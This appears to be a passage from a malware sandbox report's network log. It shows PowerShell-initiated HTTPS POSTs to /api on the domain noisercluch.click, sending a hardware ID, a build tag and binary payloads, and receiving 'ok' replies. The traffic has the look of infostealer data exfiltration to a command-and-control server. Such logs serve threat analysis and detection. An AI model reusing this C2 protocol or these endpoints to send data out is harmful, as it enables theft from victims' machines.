Ascii: nROiDhLeRR4pTkDxUdI1e4WznKCASSYRmtzqRgyPQ+MJA9Kq51pwrYk/8RDx89W/9MftRHBJYnTu6G5i7K73Fv0R0oonawD8HX6lAZUDRduBw31UYCkyFT5c2ja9/8ODqcPTWreqcC153/EQoUPlz+RHeTBkOZOQG1hotr3fA9IdMHeL47vULXm7VGQBg2UvtPeNBACIwhU+vLrXzL8j89ki8yr3OnC9ue8BkEUH0R/1w3iwgikypN59GoLtK5K
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 30 71 33 4f 72 44 39 7a 58 75 31 34 48 43 48 4d 4a 75 47 35 30 78 30 73 4a 33 42 52 43 34 38 69 76 65 49 33 6f 66 79 37 52 4f 6a 54 68 4c 65 51 50 30 5a 2f 7a 44 41 38 64 4d 46 2f 32 53 33 4c 63 51 41 4f 65 4c 45 54 70 7a 61 4e 74 77 50 4d 6a 50 5a 45 31 50 61 42 2f 72 6b 4b 65 31 2f 49 47 51 45 68 7a 59 4f 39 50 4e 65 5a 4c 44 5a 41 6d 56 36 33 5a 35 6e 65 4e 38 44 31 33 79 58 30 31 71 58 43 68 44 64 47 64 2b 78 73 4b 48 44 74 66 2b 31 5a 34 31 30 67 50 6c 69 74 4d 34 38 4b 67 5a 38 62 38 4e 7a 65 51 4e 33 6a 76 4e 61 4d 61 6b 4d 2b 31 4b 67 63 63 50 6c 36 36 63 58 54 64 52 67 53 49 59 56 36 6a 33 2b 68 70 77 62 64 70 64 35 30 30 4f 4b 70 2f 6f 41 4c 58 6d 76 41 64 42 78 4d 2b 56 76 4a 4b 63 4e 64 45 43 70 4d 6e 51 65 72 43 72 58 7a 49 2f 6a 30 37 30 58 Data Ascii: 0q3OrD9zXu14HCHMJuG50x0sJ3BRC48iveI3ofy7ROjThLeQP0Z/zDA8dMF/2S3LcQAOeLETpzaNtwPMjPZE1PaB/rkKe1/IGQEhzYO9PNeZLDZAmV63Z5neN8D13yX01qXChDdGd+xsKHDtf+1Z410gPlitM48KgZ8b8NzeQN3jvNaMakM+1KgccPl66cXTdRgSIYV6j3+hpwbdpd500OKp/oALXmvAdBxM+VvJKcNdECpMnQerCrXzI/j070X
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 75 30 7a 4a 31 2f 49 53 51 45 68 7a 57 50 46 57 65 64 31 42 44 70 67 70 52 75 50 4c 6f 32 6a 47 38 44 59 78 6e 44 55 31 70 48 61 6c 42 74 71 46 39 68 55 4b 48 54 6b 52 74 67 52 77 79 77 68 62 33 67 5a 4e 78 4e 61 7a 66 4e 75 33 4c 6e 6d 49 66 54 2b 74 4e 66 78 43 30 35 6a 38 45 51 67 59 50 46 37 38 53 6e 48 56 52 51 61 52 4b 31 50 6c 79 4b 56 6c 77 76 77 6a 4e 35 77 35 4e 4b 56 39 72 77 69 51 32 62 55 5a 47 46 42 72 45 63 31 4a 65 4e 4e 4c 46 64 34 2b 44 2f 53 47 72 32 4b 4e 72 33 45 37 6e 7a 30 33 72 58 6d 76 43 74 47 62 2b 78 6b 46 47 54 74 5a 36 6b 56 7a 32 30 6b 4e 6b 53 42 46 36 4d 4f 73 61 63 6e 78 50 6e 66 66 66 54 2b 35 4e 66 78 43 2f 37 44 41 58 43 45 71 63 30 36 32 58 54 66 55 52 45 50 47 59 55 33 75 79 71 42 68 79 2f 34 39 50 5a 67 32 4e 4b 70 Data Ascii: u0zJ1/ISQEhzWPFWed1BDpgpRuPLo2jG8DYxnDU1pHalBtqF9hUKHTkRtgRwywhb3gZNxNazfNu3LnmIfT+tNfxC05j8EQgYPF78SnHVRQaRK1PlyKVlwvwjN5w5NKV9rwiQ2bUZGFBrEc1JeNNLFd4+D/SGr2KNr3E7nz03rXmvCtGb+xkFGTtZ6kVz20kNkSBF6MOsacnxPnfffT+5NfxC/7DAXCEqc062XTfUREPGYU3uyqBhy/49PZg2NKp
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 4a 4c 36 48 77 45 57 49 56 62 78 56 6e 6e 65 52 77 75 57 4b 45 44 70 77 36 56 6f 77 66 30 77 4d 4a 38 7a 4d 4f 45 37 35 41 58 49 31 36 31 65 49 51 41 6f 51 2b 35 4a 56 74 35 48 51 34 46 76 57 4b 33 42 70 43 36 56 74 7a 67 6c 6c 54 41 71 71 48 4b 71 44 64 4f 46 39 42 4d 4c 41 6a 52 65 2f 45 4e 37 31 55 63 46 6e 79 52 4c 34 63 47 74 5a 63 4c 37 63 58 6e 52 4f 69 44 68 4c 65 51 73 32 34 54 69 48 51 34 62 4a 55 71 34 57 7a 6e 4b 43 41 53 53 59 52 6d 74 78 61 4e 6c 79 66 63 39 4e 35 55 77 4f 4c 4e 36 6f 77 58 5a 6e 4f 63 55 42 78 63 34 57 66 4e 4c 63 63 46 45 44 59 77 6b 55 2f 2b 47 35 69 37 4b 37 33 46 76 30 51 73 2f 73 57 57 6e 51 4f 47 42 39 67 67 4c 48 54 38 52 35 77 70 75 6b 30 38 50 33 6e 6b 42 36 38 6d 68 62 63 4c 32 4f 44 75 63 4f 44 47 6b 64 4b 49 47 Data Ascii: JL6HwEWIVbxVnneRwuWKEDpw6Vowf0wMJ8zMOE75AXI161eIQAoQ+5JVt5HQ4FvWK3BpC6VtzgllTAqqHKqDdOF9BMLAjRe/EN71UcFnyRL4cGtZcL7cXnROiDhLeQs24TiHQ4bJUq4WznKCASSYRmtxaNlyfc9N5UwOLN6owXZnOcUBxc4WfNLccFEDYwkU/+G5i7K73Fv0Qs/sWWnQOGB9ggLHT8R5wpuk08P3nkB68mhbcL2ODucODGkdKIG
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 30 62 55 43 77 66 34 51 52 77 33 77 68 62 33 69 4a 47 37 73 65 69 5a 38 48 34 4e 6a 4f 44 4e 7a 2b 7a 64 4b 55 4a 33 5a 76 31 45 77 30 61 4d 6c 6a 31 53 48 72 55 54 77 79 62 59 51 2b 74 77 62 41 75 6c 62 63 51 4f 70 6f 78 59 2f 73 31 75 30 7a 4a 31 2f 49 53 51 45 68 7a 55 66 4a 42 66 64 35 4c 44 4a 30 7a 51 4f 76 55 71 47 50 48 35 54 73 38 6c 44 41 31 72 48 61 69 42 4e 75 62 35 78 63 41 45 7a 67 52 74 67 52 77 79 77 68 62 33 67 4a 57 2b 38 79 76 59 74 76 38 4d 44 53 48 4d 43 6a 68 4f 2b 51 54 31 34 61 31 52 68 59 41 4a 46 62 6e 43 6d 36 54 54 77 2f 65 65 51 48 72 7a 36 35 70 79 2f 6b 6a 4d 70 63 79 4e 36 68 38 6f 41 72 54 6c 2f 45 61 42 78 55 77 58 66 4e 44 64 4e 78 4d 43 70 41 6f 54 71 32 49 36 47 6e 56 74 32 6c 33 73 43 59 37 72 58 6a 6b 48 5a 36 4f 74 Data Ascii: 0bUCwf4QRw3whb3iJG7seiZ8H4NjODNz+zdKUJ3Zv1Ew0aMlj1SHrUTwybYQ+twbAulbcQOpoxY/s1u0zJ1/ISQEhzUfJBfd5LDJ0zQOvUqGPH5Ts8lDA1rHaiBNub5xcAEzgRtgRwywhb3gJW+8yvYtv8MDSHMCjhO+QT14a1RhYAJFbnCm6TTw/eeQHrz65py/kjMpcyN6h8oArTl/EaBxUwXfNDdNxMCpAoTq2I6GnVt2l3sCY7rXjkHZ6Ot
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 30 53 62 67 63 4e 2f 4e 44 46 5a 73 6d 56 36 2f 7a 71 32 44 44 38 43 64 33 6a 67 4a 32 34 58 71 2b 51 6f 69 75 37 46 34 48 48 48 4d 4a 75 46 46 77 30 30 38 5a 69 43 5a 4e 2f 4d 32 6c 59 75 2f 34 4e 69 47 53 4d 6a 75 77 66 4f 67 4a 33 64 65 37 58 67 63 49 63 77 6d 34 61 33 44 46 53 79 79 64 4d 45 69 74 69 4f 68 70 32 37 64 70 64 36 39 39 4b 71 4a 6c 70 77 33 42 71 62 56 47 47 53 35 7a 57 75 35 44 5a 39 42 65 43 4a 4d 74 55 4e 4f 47 38 44 71 66 70 57 4e 6c 77 79 4a 34 76 6b 72 71 51 74 48 58 72 53 63 5a 55 43 55 52 6f 42 59 35 6b 31 70 44 78 6d 45 47 37 74 53 36 61 4d 37 68 4d 6e 43 76 41 78 2b 33 66 36 4d 53 31 34 44 36 58 6b 35 51 50 42 47 67 66 54 66 61 54 78 69 50 4e 30 7a 39 77 65 68 52 67 37 63 70 64 38 6c 39 44 61 4a 37 71 67 58 47 68 72 67 35 46 68 Data Ascii: 0SbgcN/NDFZsmV6/zq2DD8Cd3jgJ24Xq+Qoiu7F4HHHMJuFFw008ZiCZN/M2lYu/4NiGSMjuwfOgJ3de7XgcIcwm4a3DFSyydMEitiOhp27dpd699KqJlpw3BqbVGGS5zWu5DZ9BeCJMtUNOG8DqfpWNlwyJ4vkrqQtHXrScZUCURoBY5k1pDxmEG7tS6aM7hMnCvAx+3f6MS14D6Xk5QPBGgfTfaTxiPN0z9wehRg7cpd8l9DaJ7qgXGhrg5Fh
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 53 58 75 54 42 6b 4f 4c 4b 6b 33 72 79 37 30 68 33 4f 45 79 49 5a 5a 78 4d 4c 42 34 71 45 4c 76 32 62 55 47 51 45 68 7a 5a 50 74 4b 65 64 52 65 45 74 4d 42 53 75 48 46 70 47 2f 4b 74 33 39 33 6c 33 31 67 38 6a 76 6b 42 73 48 58 72 55 35 53 53 32 59 43 72 78 51 6c 7a 41 59 61 33 6a 63 42 74 5a 54 6d 4c 74 2b 33 61 58 66 57 50 69 71 7a 63 36 63 55 30 39 44 4c 49 41 45 64 50 42 33 32 54 33 66 55 57 42 57 46 62 55 6e 75 33 4c 4a 51 38 39 77 39 4d 5a 59 6e 50 36 64 54 68 45 4b 65 31 2f 70 65 57 43 6c 7a 47 62 68 37 4f 5a 4e 51 51 38 5a 68 64 4f 37 49 70 6d 6e 62 35 6e 77 66 73 67 63 43 34 31 6d 6a 46 35 4b 6a 38 67 34 52 47 7a 35 64 75 41 6f 33 31 51 68 62 7a 6d 38 42 36 64 66 6f 4e 70 32 6c 61 6d 4c 43 61 6d 6a 7a 61 75 6f 62 6b 49 47 31 52 6c 4a 65 63 30 4f Data Ascii: SXuTBkOLKk3ry70h3OEyIZZxMLB4qELv2bUGQEhzZPtKedReEtMBSuHFpG/Kt393l31g8jvkBsHXrU5SS2YCrxQlzAYa3jcBtZTmLt+3aXfWPiqzc6cU09DLIAEdPB32T3fUWBWFbUnu3LJQ89w9MZYnP6dThEKe1/peWClzGbh7OZNQQ8ZhdO7Ipmnb5nwfsgcC41mjF5Kj8g4RGz5duAo31Qhbzm8B6dfoNp2lamLCamjzauobkIG1RlJec0O
2024-12-30 18:16:29 UTC	1369	IN	Data Raw: 51 68 62 7a 57 38 42 2f 34 62 77 4c 6f 72 35 50 44 61 53 4d 7a 75 7a 5a 36 49 42 78 70 53 79 49 44 34 31 50 6c 7a 39 53 6e 44 74 64 69 4b 55 4d 55 7a 69 77 65 70 4f 79 75 45 79 43 61 38 4b 4b 61 5a 6c 35 69 54 54 67 66 5a 65 54 6c 41 72 45 61 41 45 56 74 6c 59 44 70 45 6d 41 38 33 42 76 6d 32 4e 75 58 45 7a 30 57 56 34 68 48 69 70 42 39 36 51 74 7a 38 4b 41 44 35 65 2f 77 5a 58 31 46 34 41 33 6d 38 42 34 59 62 77 4c 73 7a 39 49 54 71 65 4f 6e 53 6d 62 36 4e 43 6e 74 66 37 58 6c 68 51 4d 6c 76 6f 53 58 6a 55 42 41 57 51 4c 77 48 79 69 4c 45 75 32 37 64 70 5a 4e 39 39 4b 75 45 74 35 45 58 54 68 65 63 59 41 77 59 77 46 73 5a 36 57 73 46 50 45 35 31 6a 63 4f 44 43 76 6e 76 4f 35 7a 59 4a 72 78 41 71 70 6d 57 6e 51 4f 47 42 39 68 34 4f 46 33 4d 66 75 46 77 33 Data Ascii: QhbzW8B/4bwLor5PDaSMzuzZ6IBxpSyID41Plz9SnDtdiKUMUziwepOyuEyCa8KKaZl5iTTgfZeTlArEaAEVtlYDpEmA83Bvm2NuXEz0WV4hHipB96Qtz8KAD5e/wZX1F4A3m8B4YbwLsz9ITqeOnSmb6NCntf7XlhQMlvoSXjUBAWQLwHyiLEu27dpZN99KuEt5EXThecYAwYwFsZ6WsFPE51jcODCvnvO5zYJrxAqpmWnQOGB9h4OF3MfuFw3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49984	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:16:30 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=O5AQ2FI3ESYY4E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12811 Host: noisercluch.click
2024-12-30 18:16:30 UTC	12811	OUT	Data Raw: 2d 2d 4f 35 41 51 32 46 49 33 45 53 59 59 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4f 35 41 51 32 46 49 33 45 53 59 59 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 35 41 51 32 46 49 33 45 53 59 59 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 4f 35 41 51 32 46 49 33 Data Ascii: --O5AQ2FI3ESYY4EContent-Disposition: form-data; name="hwid"3DAFEC2D0DBD13D4D9AC212D15D33917--O5AQ2FI3ESYY4EContent-Disposition: form-data; name="pid"2--O5AQ2FI3ESYY4EContent-Disposition: form-data; name="lid"WG6I6S--web44--O5AQ2FI3
2024-12-30 18:16:31 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:16:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8b5ck5eca7msn58ojasavhst31; expires=Fri, 25 Apr 2025 12:03:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3iiHwEftzs1uviUfD%2F3Ar3v0mw0PHmqDYP64S5N7DVJ3mMaHwKj0VGo2EbTXz1iGFiODGaP2UGG9MbtdoHYAYVLPxEYVs7eWuakY3KnlhcrdTbfEPHhNGY88sMNwKw1nR5OGTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa40577bf9f42e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2956&min_rtt=1721&rtt_var=1528&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13748&delivery_rate=1696687&cwnd=241&unsent_bytes=0&cid=867498b2b1059ed0&ts=499&x=0"
2024-12-30 18:16:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 18:16:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49985	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:16:31 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U160XEKHTB7Z5JZ0HY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15077 Host: noisercluch.click
2024-12-30 18:16:31 UTC	15077	OUT	Data Raw: 2d 2d 55 31 36 30 58 45 4b 48 54 42 37 5a 35 4a 5a 30 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 55 31 36 30 58 45 4b 48 54 42 37 5a 35 4a 5a 30 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 31 36 30 58 45 4b 48 54 42 37 5a 35 4a 5a 30 48 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 Data Ascii: --U160XEKHTB7Z5JZ0HYContent-Disposition: form-data; name="hwid"3DAFEC2D0DBD13D4D9AC212D15D33917--U160XEKHTB7Z5JZ0HYContent-Disposition: form-data; name="pid"2--U160XEKHTB7Z5JZ0HYContent-Disposition: form-data; name="lid"WG6I6S--web44
2024-12-30 18:16:32 UTC	1130	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:16:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=69b6rpmpjesqjiughav105s35p; expires=Fri, 25 Apr 2025 12:03:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9RZsanjJz8tc2k1iZLx9wfdF6LyspmIlle6%2Bxz%2FYIdkqyZwO1r4xOzdSqpAUhTacftIZNdSpgx2bBab4gwt9RC7fVNquBOa5OPkAghQfsvc9x4vfvCbOdwIuUTgKoHwnnpY8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4057dcb710f8b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1601&rtt_var=612&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16018&delivery_rate=1771844&cwnd=237&unsent_bytes=0&cid=bcad7eb1db104c64&ts=528&x=0"
2024-12-30 18:16:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 18:16:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49986	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:16:32 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FWGB2B01JZG6DGFXV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20561 Host: noisercluch.click
2024-12-30 18:16:32 UTC	15331	OUT	Data Raw: 2d 2d 46 57 47 42 32 42 30 31 4a 5a 47 36 44 47 46 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 57 47 42 32 42 30 31 4a 5a 47 36 44 47 46 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 57 47 42 32 42 30 31 4a 5a 47 36 44 47 46 58 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d Data Ascii: --FWGB2B01JZG6DGFXVContent-Disposition: form-data; name="hwid"3DAFEC2D0DBD13D4D9AC212D15D33917--FWGB2B01JZG6DGFXVContent-Disposition: form-data; name="pid"3--FWGB2B01JZG6DGFXVContent-Disposition: form-data; name="lid"WG6I6S--web44-
2024-12-30 18:16:32 UTC	5230	OUT	Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2024-12-30 18:17:41 UTC	1133	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tpmi1mrb8mm0ngapter1u1gelk; expires=Fri, 25 Apr 2025 12:04:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Z5W5GR5NhO44GhcVX9hrX61mZeF5ELQj0QVmXUa1UHMLntEDWI%2FNTpQi9IuDmoLdLWyx17X1eLntNLnVy6BTHlOsvV93ITstjXvJR8Ys955qA3e5eCNQbBr0X5E2%2BX3koyaUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa405854f2ac34b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1508&rtt_var=571&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21523&delivery_rate=1906005&cwnd=163&unsent_bytes=0&cid=4cfa70327e2b598e&ts=68989&x=0"
2024-12-30 18:17:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 18:17:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49987	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:17:42 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HVG2RJ7Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1186 Host: noisercluch.click
2024-12-30 18:17:42 UTC	1186	OUT	Data Raw: 2d 2d 48 56 47 32 52 4a 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 41 46 45 43 32 44 30 44 42 44 31 33 44 34 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 48 56 47 32 52 4a 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 56 47 32 52 4a 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 34 34 0d 0a 2d 2d 48 56 47 32 52 4a 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 Data Ascii: --HVG2RJ7YContent-Disposition: form-data; name="hwid"3DAFEC2D0DBD13D4D9AC212D15D33917--HVG2RJ7YContent-Disposition: form-data; name="pid"1--HVG2RJ7YContent-Disposition: form-data; name="lid"WG6I6S--web44--HVG2RJ7YContent-Disposit
2024-12-30 18:17:50 UTC	1137	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 18:17:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k70npkvh1bdmu8r59tfls4b6fe; expires=Fri, 25 Apr 2025 12:04:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sCAfSC8%2BMTydgPgngCiaNIpJF%2BEhrumfQdD41CcyN2gWYY4oSSGCUwIDkGyz5Qn8lIPeN%2BHH1Y364gw3ZVjjolpD8kWSAen4sq1UE%2F%2FhQ44xOhnFtNBz%2BphXTZE52X4kM3BYEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa40738dcee429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1778&rtt_var=676&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2094&delivery_rate=1642294&cwnd=246&unsent_bytes=0&cid=a6350998718bb720&ts=7644&x=0"
2024-12-30 18:17:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-30 18:17:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49988	188.114.96.3	443	2292	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 18:17:50 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JHX85ADRORZATN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584391 Host: noisercluch.click
